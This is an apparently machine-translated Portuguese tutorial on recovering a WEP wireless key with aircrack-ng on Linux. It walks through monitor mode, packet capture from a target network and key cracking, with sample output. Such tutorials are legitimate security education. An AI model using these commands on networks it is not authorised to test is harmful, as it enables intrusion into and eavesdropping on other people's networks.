Este artigo em breve descreve passos simples sobre como quebrar uma chave WEP sem fio usando o pacote aircrack-ng software. Isso pode ser feito farejando uma rede sem fio, capturando pacotes criptografados e executando o programa de cracking de criptografia apropriado na tentativa de descriptografar os dados capturados. WEP (Wired Equivalent Privacy) é muito fácil de quebrar, pois usa apenas uma chave para criptografar todo o tráfego.
o princípio básico é que a comunicação entre dois nós na rede é baseada no endereço MAC. Cada host recebe pacotes destinados apenas ao endereço MAC de sua própria interface. O mesmo princípio também se aplica às redes sem fio. No entanto, se um nó definir sua própria placa de rede no modo promíscuo, ele também receberá pacotes que não são endereçados para seu próprio endereço MAC.
para quebrar a chave WEP, um hacker precisa capturar pacotes de amostra não destinados à sua própria interface de rede e executar o programa crack para comparar chaves de teste com a chave WEP empacotada com pacotes capturados na tentativa de descriptografia. A chave que se encaixa para descriptografar pacotes capturados é a chave usada pela rede sem fio para criptografar toda a sua comunicação sem fio com suas estações conectadas.
nas seções a seguir, guiaremos você pela instalação do aircrack-ng no Linux e, em seguida, mostraremos as instruções passo a passo para quebrar uma chave WEP sem fio. O guia assume que você tem a placa de rede sem fio instalada e que suporta o modo monitor.
neste tutorial você vai aprender:
- Como instalar o aircrack-ng nas principais distribuições de Linux
- Como quebrar uma chave WEP sem fio usando o pacote aircrack-ng
| Categoria | Requisitos, Convenções ou Versão de Software Utilizada |
|---|---|
| Sistema | Qualquer distro Linux |
| Software | aircrack-ng |
| outros | acesso privilegiado ao seu sistema Linux como root ou através do comando sudo. |
| Convenções | # – requer dado linux comandos para ser executada com privilégios de root, quer directamente como usuário root ou através do uso de sudo comando$ – requer dado linux comandos para ser executada como um usuário não privilegiado |
Instalar o aircrack-ng nas principais distribuições de Linux
Para começar, você vai precisar do pacote aircrack-ng software instalado no seu sistema. Você pode usar o comando apropriado abaixo para instalar o programa com o Gerenciador de pacotes do seu sistema.
Para instalar o aircrack-ng no Ubuntu, Debian e no Linux Mint:
$ sudo apt install aircrack-ng
Para instalar o aircrack-ng no CentOS, Fedora, AlmaLinux, e a Red Hat:
$ sudo dnf install aircrack-ng
Para instalar o aircrack-ng no Arch Linux e Manjaro:
$ sudo pacman -S aircrack-ng
Crack sem fio WEP key
- Primeiro precisamos identificar o nome da nossa interface de rede sem fio. Se a sua placa de rede sem fio estiver instalada corretamente, um comando
iwconfigrevelará o nome da sua interface de rede sem fio:$ iwconfigwlan0 IEEE 802.11 Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dBm
a saída mostra que, no nosso caso, o nome da interface é
wlan0. - em seguida, ative o modo monitor para a interface sem fio.
# airmon-ng start wlan0Interface Chipset Driverwlan0 rtl8180 - (monitor mode enabled on mon0)
o resultado do comando lhe dará o nome da nova interface virtual. Tende a ser
mon0. - despejar os resultados do monitor em um terminal, para que você possa vê-los.
# airodump-ng mon0
você pode ver uma tabela de dados relativos a redes sem fio em sua área. Você só precisa de informações sobre a rede que deseja quebrar. Procure por ele e observe o BSSID e o canal em que está.
- em seguida, você registrará os resultados de uma verificação em um arquivo. Esse registro de captura será necessário pelo Aircrack para executar um ataque de Força bruta na rede mais tarde. Para obter sua captura, você executará o mesmo comando de antes, mas especificará seu BSSID, canal e o local de registro.
# airodump-ng -c 1 --bssid XX:XX:XX:XX:XX:XX -w Documents/logs/wep-crack mon0
preencha suas informações reais antes de executar o comando e deixe-as em execução.
- como última etapa, quebramos a chave WEP usando pacotes capturados e o comando aircrack-ng. Todos os pacotes capturados agora são armazenados no arquivo
wep-crack-01.cap.# aircrack-ng -z wep-crack-01.cap
a Sua saída deve ser algo como isto:
Opening wep-crack-01.capRead 450 packets. # BSSID ESSID Encryption 1 00:11:95:9F:FD:F4 linuxconfig.org WEP (210 IVs) 2 00:17:3F:65:2E:5A belkin54g None (0.0.0.0)Index number of target network ?1 Aircrack-ng 1.0 rc1 Tested 485 keys (got 16690 IVs) KB depth byte(vote) 0 9/ 13 00(20992) 06(20736) 27(20736) 3F(20736) A2(20736) 1 0/ 1 F3(28416) A8(23296) 34(21248) 57(21248) A3(21248) 2 0/ 2 8E(25856) BC(23808) 3F(23040) D2(22784) 69(21504) 3 0/ 5 6E(24320) 35(22528) 5A(22016) 95(22016) B8(22016) 4 3/ 4 98(21504) 7C(20992) 84(20992) E0(20992) F0(20992) KEY FOUND! Decrypted correctly: 100%
Fechamento de Pensamentos
neste guia, vimos como instalar o aircrack-ng no Linux e usar o software para quebrar uma chave WEP sem fio. Lembre-se de que esse processo só deve ser usado para testar sua própria segurança ou para fins educacionais. Usá-lo na rede de outra pessoa é ilegal.